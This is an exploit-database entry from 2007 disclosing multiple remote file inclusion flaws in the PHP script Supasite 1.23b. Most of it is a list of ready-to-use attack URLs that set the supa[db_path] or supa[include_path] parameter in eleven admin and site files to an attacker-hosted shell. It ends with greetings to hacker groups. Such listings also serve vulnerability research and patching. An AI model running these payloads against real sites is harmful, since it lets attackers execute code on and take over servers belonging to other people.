Supasite 1.23b Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Supasite 1.23b Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-04-21
# Author : GoLd_M
# Previous Title : Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability
# Next Title : Mx Module Smartor Album FAP 2.0 RC 1 Remote File Inclusion Vuln

# Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://belnet.dl.sourceforge.net/sourceforge/supasite/supasite1.23b.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/supasite/common_functions.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_auth_cookies.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_mods.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_news.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_settings.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/admin_topics.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_users.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_utilities.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/backend_site.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/site_comment.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/site_news.php?supa[db_path]=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# www.Syue.com [2007-04-21]